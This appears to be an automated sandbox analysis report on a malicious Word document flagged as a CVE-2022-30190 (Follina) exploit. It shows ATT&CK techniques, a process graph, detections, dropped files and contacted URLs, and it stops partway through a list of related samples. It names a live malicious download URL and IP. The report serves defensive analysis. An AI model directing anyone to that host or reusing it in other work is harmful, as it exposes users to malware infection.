          Exploitation for Client Execution          		Boot or Logon Initialization Scripts1
          DLL Side-Loading          		11
          Process Injection          		LSASS Memory1
          Application Window Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          DLL Side-Loading          		Security Account Manager1
          Remote System Discovery          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS2
          File and Directory Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets13
          System Information Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 686090 Sample: qoIZSkdejM.docx Startdate: 18/08/2022 Architecture: WINDOWS Score: 100 45 Malicious sample detected (through community Yara rule) 2->45 47 Antivirus detection for URL or domain 2->47 49 Antivirus detection for dropped file 2->49 51 6 other signatures 2->51 6 WINWORD.EXE 75 59 2->6         started        10 csc.exe 3 2->10         started        12 csc.exe 3 2->12         started        14 csc.exe 3 2->14         started        process3 dnsIp4 43 www.malwarejake.com 143.198.109.79, 443, 49741, 49742 LDCOMNETFR United States 6->43 31 C:\Users\user\AppData\Local\...\456[1].htm, HTML 6->31 dropped 33 C:\Users\user\AppData\Local\...F858049.htm, HTML 6->33 dropped 35 C:\Users\user\AppData\Local\...\CCAB4A43.htm, HTML 6->35 dropped 16 msdt.exe 21 6->16         started        19 MSOSYNC.EXE 5 12 6->19         started        37 C:\Users\user\AppData\Local\...\md5akkd2.dll, PE32 10->37 dropped 21 cvtres.exe 1 10->21         started        39 C:\Users\user\AppData\Local\...\uhgycnj1.dll, PE32 12->39 dropped 23 cvtres.exe 1 12->23         started        41 C:\Users\user\AppData\Local\...\cywbhpso.dll, PE32 14->41 dropped 25 cvtres.exe 1 14->25         started        file5 process6 file7 27 C:\Windows\Temp\...\DiagPackage.dll.mui, PE32 16->27 dropped 29 C:\Windows\Temp\...\DiagPackage.dll, PE32+ 16->29 dropped

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          qoIZSkdejM.docx35%VirustotalBrowse
          qoIZSkdejM.docx23%MetadefenderBrowse
          qoIZSkdejM.docx45%ReversingLabsDocument-Word.Exploit.CVE-2022-30190
          qoIZSkdejM.docx100%AviraW97M/Dldr.Agent.G1

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\456[1].htm100%AviraJS/CVE-2022-30190.G
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htm100%AviraJS/CVE-2022-30190.G
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htm100%AviraJS/CVE-2022-30190.G
          C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\DiagPackage.dll0%MetadefenderBrowse
          C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\DiagPackage.dll0%ReversingLabs
          C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\en-US\DiagPackage.dll.mui0%MetadefenderBrowse
          C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\en-US\DiagPackage.dll.mui0%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          www.malwarejake.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://roaming.edog.0%URL Reputationsafe
          https://cdn.entity.0%URL Reputationsafe
          https://powerlift.acompli.net0%URL Reputationsafe
          https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
          https://cortana.ai0%URL Reputationsafe
          https://api.aadrm.com/0%URL Reputationsafe
          https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
          https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
          https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
          https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
          https://officeci.azurewebsites.net/api/0%URL Reputationsafe
          https://my.microsoftpersonalcontent.com0%URL Reputationsafe
          https://store.office.cn/addinstemplate0%URL Reputationsafe
          https://api.aadrm.com0%URL Reputationsafe
          https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
          https://www.odwebp.svc.ms0%URL Reputationsafe
          https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
          https://dataservice.o365filtering.com/0%URL Reputationsafe
          https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
          https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
          https://ncus.contentsync.0%URL Reputationsafe
          https://apis.live.net/v5.0/0%URL Reputationsafe
          https://wus2.contentsync.0%URL Reputationsafe
          https://www.malwarejake.com/456.html0%VirustotalBrowse
          https://www.malwarejake.com/456.html100%Avira URL Cloudmalware
          https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
          https://ncus.pagecontentsync.0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.malwarejake.com
          		143.198.109.79
          		truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://www.malwarejake.com/456.htmltrue
          • 0%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://api.diagnosticssdf.office.com616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
            		high
            https://login.microsoftonline.com/616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
              		high
              https://shell.suite.office.com:1443616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                		high
                https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                  		high
                  https://autodiscover-s.outlook.com/616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                    		high
                    https://roaming.edog.616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                      		high
                      https://cdn.entity.616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://api.addins.omex.office.net/appinfo/query616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                        		high
                        https://clients.config.office.net/user/v1.0/tenantassociationkey616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                          		high
                          https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                            		high
                            https://powerlift.acompli.net616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://rpsticket.partnerservices.getmicrosoftkey.com616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://lookup.onenote.com/lookup/geolocation/v1616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                              		high
                              https://cortana.ai616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                		high
                                https://cloudfiles.onenote.com/upload.aspx616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                  		high
                                  https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                    		high
                                    https://entitlement.diagnosticssdf.office.com616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                      		high
                                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                        		high
                                        https://api.aadrm.com/616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://ofcrecsvcapi-int.azurewebsites.net/616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                          		high
                                          https://api.microsoftstream.com/api/616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                            		high
                                            https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                              		high
                                              https://cr.office.com616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                		high
                                                https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                • Avira URL Cloud: safe
                                                		low
                                                https://portal.office.com/account/?ref=ClientMeControl616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                  		high
                                                  https://graph.ppe.windows.net616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                    		high
                                                    https://res.getmicrosoftkey.com/api/redemptionevents616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://powerlift-frontdesk.acompli.net616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://tasks.office.com616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                      		high
                                                      https://officeci.azurewebsites.net/api/616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://sr.outlook.office.net/ws/speech/recognize/assistant/work616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                        		high
                                                        https://my.microsoftpersonalcontent.com616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://store.office.cn/addinstemplate616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://api.aadrm.com616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://outlook.office.com/autosuggest/api/v1/init?cvid=616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                          		high
                                                          https://globaldisco.crm.dynamics.com616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                            		high
                                                            https://messaging.engagement.office.com/616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                              		high
                                                              https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                		high
                                                                https://dev0-api.acompli.net/autodetect616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://www.odwebp.svc.ms616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://api.diagnosticssdf.office.com/v2/feedback616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                  		high
                                                                  https://api.powerbi.com/v1.0/myorg/groups616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                    		high
                                                                    https://web.microsoftstream.com/video/616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                      		high
                                                                      https://api.addins.store.officeppe.com/addinstemplate616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://graph.windows.net616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                        		high
                                                                        https://dataservice.o365filtering.com/616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://officesetup.getmicrosoftkey.com616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://analysis.windows.net/powerbi/api616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                          		high
                                                                          https://prod-global-autodetect.acompli.net/autodetect616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://outlook.office365.com/autodiscover/autodiscover.json616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                            		high
                                                                            https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                              		high
                                                                              https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                		high
                                                                                https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                  		high
                                                                                  https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                    		high
                                                                                    https://ncus.contentsync.616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                      		high
                                                                                      https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                        		high
                                                                                        http://weather.service.msn.com/data.aspx616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                          		high
                                                                                          https://apis.live.net/v5.0/616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                            		high
                                                                                            https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                              		high
                                                                                              https://messaging.lifecycle.office.com/616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                		high
                                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                  		high
                                                                                                  https://management.azure.com616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                    		high
                                                                                                    https://outlook.office365.com616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                      		high
                                                                                                      https://wus2.contentsync.616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://incidents.diagnostics.office.com616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                        		high
                                                                                                        https://clients.config.office.net/user/v1.0/ios616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                          		high
                                                                                                          https://insertmedia.bing.office.net/odc/insertmedia616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                            		high
                                                                                                            https://o365auditrealtimeingestion.manage.office.com616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                              		high
                                                                                                              https://outlook.office365.com/api/v1.0/me/Activities616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                		high
                                                                                                                https://api.office.net616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                  		high
                                                                                                                  https://incidents.diagnosticssdf.office.com616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                    		high
                                                                                                                    https://asgsmsproxyapi.azurewebsites.net/616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://clients.config.office.net/user/v1.0/android/policies616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                      		high
                                                                                                                      https://entitlement.diagnostics.office.com616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                        		high
                                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                          		high
                                                                                                                          https://substrate.office.com/search/api/v2/init616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                            		high
                                                                                                                            https://outlook.office.com/616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                              		high
                                                                                                                              https://storage.live.com/clientlogs/uploadlocation616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                                		high
                                                                                                                                https://outlook.office365.com/616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://webshell.suite.office.com616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://substrate.office.com/search/api/v1/SearchHistory616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://management.azure.com/616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://messaging.lifecycle.office.com/getcustommessage16616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://clients.config.office.net/c2r/v1.0/InteractiveInstallation616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://login.windows.net/common/oauth2/authorize616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://graph.windows.net/616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://api.powerbi.com/beta/myorg/imports616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://devnull.onenote.com616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://messaging.action.office.com/616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://ncus.pagecontentsync.616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://messaging.office.com/616A64AB-67DB-4EDF-90AA-ACD416B09C2C.0.drfalse
                                                                                                                                                            		high

                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                            Public IPs

                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                            143.198.109.79
                                                                                                                                                            		www.malwarejake.comUnited States
                                                                                                                                                            		15557LDCOMNETFRtrue

                                                                                                                                                            General Information

                                                                                                                                                            Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                            Analysis ID:686090
                                                                                                                                                            Start date and time:2022-08-18 08:33:40 +02:00
                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                            Overall analysis duration:0h 8m 47s
                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                            Report type:full
                                                                                                                                                            Sample file name:qoIZSkdejM.docx
                                                                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                            Run name:Potential for more IOCs and behavior
                                                                                                                                                            Number of analysed new started processes analysed:25
                                                                                                                                                            Number of new started drivers analysed:1
                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                            Technologies:
                                                                                                                                                            • HCA enabled
                                                                                                                                                            • EGA enabled
                                                                                                                                                            • HDC enabled
                                                                                                                                                            • AMSI enabled
                                                                                                                                                            Analysis Mode:default
                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                            Detection:MAL
                                                                                                                                                            Classification:mal100.expl.evad.winDOCX@14/31@2/1
                                                                                                                                                            EGA Information:Failed
                                                                                                                                                            HDC Information:Failed
                                                                                                                                                            HCA Information:
                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                            • Number of executed functions: 0
                                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Found application associated with file extension: .docx
                                                                                                                                                            • Adjust boot time
                                                                                                                                                            • Enable AMSI
                                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                            • Attach to Office via COM
                                                                                                                                                            • Scroll down
                                                                                                                                                            • Close Viewer

                                                                                                                                                            Warnings

                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, mrxdav.sys, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.109.32.24, 52.109.12.22, 52.109.76.34, 52.109.76.36, 52.109.88.39, 52.109.76.33
                                                                                                                                                            • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, arc.msn.com, pastebin.com, ris.api.iris.microsoft.com, g.msn.com, config.officeapps.live.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                            Simulations

                                                                                                                                                            Behavior and APIs

                                                                                                                                                            No simulations

                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                            IPs

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            143.198.109.79qoIZSkdejM.docxGet hashmaliciousBrowse

                                                                                                                                                              Domains

                                                                                                                                                              No context

                                                                                                                                                              ASNs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              LDCOMNETFRqoIZSkdejM.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              micIUMDDI8Get hashmaliciousBrowse
                                                                                                                                                              • 93.7.241.72
                                                                                                                                                              IDTkPkfSPqGet hashmaliciousBrowse
                                                                                                                                                              • 86.67.2.79
                                                                                                                                                              YUXGuHu2g2Get hashmaliciousBrowse
                                                                                                                                                              • 80.124.112.44
                                                                                                                                                              B1q7pxY7YPGet hashmaliciousBrowse
                                                                                                                                                              • 84.100.235.154
                                                                                                                                                              GUWBakg2SJGet hashmaliciousBrowse
                                                                                                                                                              • 77.158.57.185
                                                                                                                                                              SecuriteInfo.com.Linux.Siggen.9999.14754.14903Get hashmaliciousBrowse
                                                                                                                                                              • 86.72.230.25
                                                                                                                                                              SecuriteInfo.com.Linux.Siggen.9999.11071.28797Get hashmaliciousBrowse
                                                                                                                                                              • 77.130.137.171
                                                                                                                                                              kxmHWYv2abGet hashmaliciousBrowse
                                                                                                                                                              • 109.20.145.124
                                                                                                                                                              arm-20220816-1117Get hashmaliciousBrowse
                                                                                                                                                              • 86.76.114.110
                                                                                                                                                              i686-20220816-1117Get hashmaliciousBrowse
                                                                                                                                                              • 93.31.102.164
                                                                                                                                                              cKr3pNwuY7Get hashmaliciousBrowse
                                                                                                                                                              • 86.68.24.206
                                                                                                                                                              home.armGet hashmaliciousBrowse
                                                                                                                                                              • 80.124.112.19
                                                                                                                                                              home.x86Get hashmaliciousBrowse
                                                                                                                                                              • 86.78.205.215
                                                                                                                                                              home.arm7Get hashmaliciousBrowse
                                                                                                                                                              • 109.24.28.73
                                                                                                                                                              kG7ktScD2lGet hashmaliciousBrowse
                                                                                                                                                              • 109.19.212.46
                                                                                                                                                              r4CbVvNAXpGet hashmaliciousBrowse
                                                                                                                                                              • 84.102.35.204
                                                                                                                                                              skid.x86_64-20220815-1818Get hashmaliciousBrowse
                                                                                                                                                              • 79.85.76.108
                                                                                                                                                              skid.x86-20220815-1818Get hashmaliciousBrowse
                                                                                                                                                              • 84.101.231.202
                                                                                                                                                              skid.mips-20220815-1818Get hashmaliciousBrowse
                                                                                                                                                              • 37.71.38.3

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              ce5f3254611a8c095a3d821d44539877C1ZGt61uGv.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              FzgkVbUkUm.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              YccRHfFd3T.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              dl18aYTBo5.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              wWLwoD14Xo.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              ZZkLH4O0Y3.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              icRTA4gcSe.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              dfqqRjnCV5.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              uaMVRwwuyZ.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              NeF7svYyqN.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              yYtTDWoZWx.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              6bdklAYa6u.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              o3MCBdIl7r.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              a2Mx3iJgEo.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              aeXxqezX4E.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              WUumgFooNU.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              SecuriteInfo.com.W32.SmokeLoader.C.genEldorado.4925.exeGet hashmaliciousBrowse
